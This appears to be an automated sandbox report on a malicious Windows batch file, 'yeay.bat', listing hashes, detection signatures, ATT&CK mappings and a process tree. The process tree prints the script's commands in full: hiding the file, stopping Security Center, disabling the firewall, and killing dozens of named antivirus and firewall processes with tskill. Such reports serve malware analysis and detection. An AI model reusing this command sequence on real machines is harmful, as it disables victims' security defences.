d3adb1521dea6e9221677abcb9d6fa0e61761791547272643bee28f0ac58f77a

Analysis

max time kernel
118s
max time network
123s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
12-10-2023 10:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

yeay.bat
Size

3KB
MD5

c52ea73e0ff610403ce0b53173a55ad7
SHA1

59080dfb6964f2cb71cb3d8ce247b6e714310094
SHA256

d3adb1521dea6e9221677abcb9d6fa0e61761791547272643bee28f0ac58f77a
SHA512

f0d33fef150eded146186d1e939527eb8f5a7ecf208edf1eddc63b9ffffa2fe62278f6f890c406754951427090c35e0ca21620638093ee4ac18fb45779a6a25c

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2652	netsh.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2560	tskill.exe
2560	tskill.exe
2688	tskill.exe
2688	tskill.exe
2584	tskill.exe
2584	tskill.exe
2460	tskill.exe
2460	tskill.exe
1632	tskill.exe
1632	tskill.exe
2892	tskill.exe
2892	tskill.exe
2612	tskill.exe
2612	tskill.exe
2072	tskill.exe
2072	tskill.exe
2480	tskill.exe
2480	tskill.exe
2856	tskill.exe
2856	tskill.exe
2476	tskill.exe
2476	tskill.exe
2492	tskill.exe
2492	tskill.exe
2616	tskill.exe
2616	tskill.exe
2508	tskill.exe
2508	tskill.exe
2564	tskill.exe
2564	tskill.exe
1256	tskill.exe
1256	tskill.exe
2452	tskill.exe
2452	tskill.exe
2464	tskill.exe
2464	tskill.exe
2472	tskill.exe
2472	tskill.exe
2504	tskill.exe
2504	tskill.exe
2512	tskill.exe
2512	tskill.exe
2524	tskill.exe
2524	tskill.exe
2620	tskill.exe
2620	tskill.exe
1708	tskill.exe
1708	tskill.exe
2980	tskill.exe
2980	tskill.exe
3016	tskill.exe
3016	tskill.exe
2984	tskill.exe
2984	tskill.exe
2180	tskill.exe
2180	tskill.exe
2112	tskill.exe
2112	tskill.exe
2456	tskill.exe
2456	tskill.exe
2432	tskill.exe
2432	tskill.exe
544	tskill.exe
544	tskill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2880 wrote to memory of 3044	2880	cmd.exe	29
PID 2880 wrote to memory of 3044	2880	cmd.exe	29
PID 2880 wrote to memory of 3044	2880	cmd.exe	29
PID 2880 wrote to memory of 2580	2880	cmd.exe	30
PID 2880 wrote to memory of 2580	2880	cmd.exe	30
PID 2880 wrote to memory of 2580	2880	cmd.exe	30
PID 2580 wrote to memory of 2600	2580	net.exe	31
PID 2580 wrote to memory of 2600	2580	net.exe	31
PID 2580 wrote to memory of 2600	2580	net.exe	31
PID 2880 wrote to memory of 2652	2880	cmd.exe	32
PID 2880 wrote to memory of 2652	2880	cmd.exe	32
PID 2880 wrote to memory of 2652	2880	cmd.exe	32
PID 2880 wrote to memory of 2560	2880	cmd.exe	33
PID 2880 wrote to memory of 2560	2880	cmd.exe	33
PID 2880 wrote to memory of 2560	2880	cmd.exe	33
PID 2880 wrote to memory of 2688	2880	cmd.exe	34
PID 2880 wrote to memory of 2688	2880	cmd.exe	34
PID 2880 wrote to memory of 2688	2880	cmd.exe	34
PID 2880 wrote to memory of 2584	2880	cmd.exe	35
PID 2880 wrote to memory of 2584	2880	cmd.exe	35
PID 2880 wrote to memory of 2584	2880	cmd.exe	35
PID 2880 wrote to memory of 2460	2880	cmd.exe	36
PID 2880 wrote to memory of 2460	2880	cmd.exe	36
PID 2880 wrote to memory of 2460	2880	cmd.exe	36
PID 2880 wrote to memory of 1632	2880	cmd.exe	37
PID 2880 wrote to memory of 1632	2880	cmd.exe	37
PID 2880 wrote to memory of 1632	2880	cmd.exe	37
PID 2880 wrote to memory of 2892	2880	cmd.exe	38
PID 2880 wrote to memory of 2892	2880	cmd.exe	38
PID 2880 wrote to memory of 2892	2880	cmd.exe	38
PID 2880 wrote to memory of 2612	2880	cmd.exe	39
PID 2880 wrote to memory of 2612	2880	cmd.exe	39
PID 2880 wrote to memory of 2612	2880	cmd.exe	39
PID 2880 wrote to memory of 2072	2880	cmd.exe	40
PID 2880 wrote to memory of 2072	2880	cmd.exe	40
PID 2880 wrote to memory of 2072	2880	cmd.exe	40
PID 2880 wrote to memory of 2480	2880	cmd.exe	41
PID 2880 wrote to memory of 2480	2880	cmd.exe	41
PID 2880 wrote to memory of 2480	2880	cmd.exe	41
PID 2880 wrote to memory of 2856	2880	cmd.exe	42
PID 2880 wrote to memory of 2856	2880	cmd.exe	42
PID 2880 wrote to memory of 2856	2880	cmd.exe	42
PID 2880 wrote to memory of 2476	2880	cmd.exe	43
PID 2880 wrote to memory of 2476	2880	cmd.exe	43
PID 2880 wrote to memory of 2476	2880	cmd.exe	43
PID 2880 wrote to memory of 2492	2880	cmd.exe	44
PID 2880 wrote to memory of 2492	2880	cmd.exe	44
PID 2880 wrote to memory of 2492	2880	cmd.exe	44
PID 2880 wrote to memory of 2616	2880	cmd.exe	45
PID 2880 wrote to memory of 2616	2880	cmd.exe	45
PID 2880 wrote to memory of 2616	2880	cmd.exe	45
PID 2880 wrote to memory of 2508	2880	cmd.exe	46
PID 2880 wrote to memory of 2508	2880	cmd.exe	46
PID 2880 wrote to memory of 2508	2880	cmd.exe	46
PID 2880 wrote to memory of 2564	2880	cmd.exe	47
PID 2880 wrote to memory of 2564	2880	cmd.exe	47
PID 2880 wrote to memory of 2564	2880	cmd.exe	47
PID 2880 wrote to memory of 1256	2880	cmd.exe	48
PID 2880 wrote to memory of 1256	2880	cmd.exe	48
PID 2880 wrote to memory of 1256	2880	cmd.exe	48
PID 2880 wrote to memory of 2452	2880	cmd.exe	49
PID 2880 wrote to memory of 2452	2880	cmd.exe	49
PID 2880 wrote to memory of 2452	2880	cmd.exe	49
PID 2880 wrote to memory of 2464	2880	cmd.exe	50

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3044	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\yeay.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\AppData\Local\Temp\yeay.bat
  2⤵
  - Views/modifies file attributes
  PID:3044
- C:\Windows\system32\net.exe
  net stop ΓÇ£Security CenterΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Security CenterΓÇ¥
    3⤵
    PID:2600
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode=disable
  2⤵
  - Modifies Windows Firewall
  PID:2652
- C:\Windows\system32\tskill.exe
  tskill /A av*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2560
- C:\Windows\system32\tskill.exe
  tskill /A fire*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2688
- C:\Windows\system32\tskill.exe
  tskill /A anti*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2584
- C:\Windows\system32\tskill.exe
  tskill /A spy*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2460
- C:\Windows\system32\tskill.exe
  tskill /A bullguard
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1632
- C:\Windows\system32\tskill.exe
  tskill /A PersFw
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2892
- C:\Windows\system32\tskill.exe
  tskill /A KAV*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2612
- C:\Windows\system32\tskill.exe
  tskill /A ZONEALARM
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2072
- C:\Windows\system32\tskill.exe
  tskill /A SAFEWEB
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2480
- C:\Windows\system32\tskill.exe
  tskill /A spy*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2856
- C:\Windows\system32\tskill.exe
  tskill /A bullguard
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2476
- C:\Windows\system32\tskill.exe
  tskill /A PersFw
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2492
- C:\Windows\system32\tskill.exe
  tskill /A KAV*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2616
- C:\Windows\system32\tskill.exe
  tskill /A ZONEALARM
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2508
- C:\Windows\system32\tskill.exe
  tskill /A SAFEWEB
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2564
- C:\Windows\system32\tskill.exe
  tskill /A OUTPOST
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1256
- C:\Windows\system32\tskill.exe
  tskill /A nv*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2452
- C:\Windows\system32\tskill.exe
  tskill /A nav*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2464
- C:\Windows\system32\tskill.exe
  tskill /A F-*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2472
- C:\Windows\system32\tskill.exe
  tskill /A ESAFE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2504
- C:\Windows\system32\tskill.exe
  tskill /A cle
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2512
- C:\Windows\system32\tskill.exe
  tskill /A BLACKICE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2524
- C:\Windows\system32\tskill.exe
  tskill /A def*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2620
- C:\Windows\system32\tskill.exe
  tskill /A kav
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1708
- C:\Windows\system32\tskill.exe
  tskill /A kav*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2980
- C:\Windows\system32\tskill.exe
  tskill /A avg*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3016
- C:\Windows\system32\tskill.exe
  tskill /A ash*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2984
- C:\Windows\system32\tskill.exe
  tskill /A aswupdsv
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2180
- C:\Windows\system32\tskill.exe
  tskill /A ewid*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2112
- C:\Windows\system32\tskill.exe
  tskill /A guard*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2456
- C:\Windows\system32\tskill.exe
  tskill /A guar*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2432
- C:\Windows\system32\tskill.exe
  tskill /A gcasDt*
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:544
- C:\Windows\system32\tskill.exe
  tskill /A msmp*
  2⤵
  PID:2640
- C:\Windows\system32\tskill.exe
  tskill /A mcafe*
  2⤵
  PID:524
- C:\Windows\system32\tskill.exe
  tskill /A mghtml
  2⤵
  PID:600
- C:\Windows\system32\tskill.exe
  tskill /A msiexec
  2⤵
  PID:696
- C:\Windows\system32\tskill.exe
  tskill /A outpost
  2⤵
  PID:268
- C:\Windows\system32\tskill.exe
  tskill /A isafe
  2⤵
  PID:976
- C:\Windows\system32\tskill.exe
  tskill /A zapcls
  2⤵
  PID:112
- C:\Windows\system32\tskill.exe
  tskill /A zauinst
  2⤵
  PID:1164
- C:\Windows\system32\tskill.exe
  tskill /A upd
  2⤵
  PID:1096
- C:\Windows\system32\tskill.exe
  tskill /A zlclien*
  2⤵
  PID:596
- C:\Windows\system32\tskill.exe
  tskill /A minilog
  2⤵
  PID:1480
- C:\Windows\system32\tskill.exe
  tskill /A cc*
  2⤵
  PID:300
- C:\Windows\system32\tskill.exe
  tskill /A norton*
  2⤵
  PID:1492
- C:\Windows\system32\tskill.exe
  tskill /A norton au*
  2⤵
  PID:368
- C:\Windows\system32\tskill.exe
  tskill /A ccc*
  2⤵
  PID:2952
- C:\Windows\system32\tskill.exe
  tskill /A npfmn*
  2⤵
  PID:2340
- C:\Windows\system32\tskill.exe
  tskill /A loge*
  2⤵
  PID:872
- C:\Windows\system32\tskill.exe
  tskill /A nisum*
  2⤵
  PID:2060
- C:\Windows\system32\tskill.exe
  tskill /A issvc
  2⤵
  PID:2376
- C:\Windows\system32\tskill.exe
  tskill /A tmp*
  2⤵
  PID:2120
- C:\Windows\system32\tskill.exe
  tskill /A tmn*
  2⤵
  PID:1324
- C:\Windows\system32\tskill.exe
  tskill /A pcc*
  2⤵
  PID:2200
- C:\Windows\system32\tskill.exe
  tskill /A cpd*
  2⤵
  PID:864
- C:\Windows\system32\tskill.exe
  tskill /A pop*
  2⤵
  PID:1620
- C:\Windows\system32\tskill.exe
  tskill /A pav*
  2⤵
  PID:2080
- C:\Windows\system32\tskill.exe
  tskill /A padmincls
  2⤵
  PID:2380
- C:\Windows\system32\tskill.exe
  tskill /A panda*
  2⤵
  PID:2264
- C:\Windows\system32\tskill.exe
  tskill /A avsch*
  2⤵
  PID:2796
- C:\Windows\system32\tskill.exe
  tskill /A sche*
  2⤵
  PID:2400
- C:\Windows\system32\tskill.exe
  tskill /A syman*
  2⤵
  PID:2748
- C:\Windows\system32\tskill.exe
  tskill /A virus*
  2⤵
  PID:2764
- C:\Windows\system32\tskill.exe
  tskill /A realmcls
  2⤵
  PID:2780
- C:\Windows\system32\tskill.exe
  tskill /A sweep
  2⤵
  PID:2404
- C:\Windows\system32\tskill.exe
  tskill /A scan*
  2⤵
  PID:772
- C:\Windows\system32\tskill.exe
  tskill /A ad-*
  2⤵
  PID:2500
- C:\Windows\system32\tskill.exe
  tskill /A safe*
  2⤵
  PID:2696
- C:\Windows\system32\tskill.exe
  tskill /A avas*
  2⤵
  PID:2744
- C:\Windows\system32\tskill.exe
  tskill /A norm*
  2⤵
  PID:2768
- C:\Windows\system32\tskill.exe
  tskill /A offg*
  2⤵
  PID:2784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads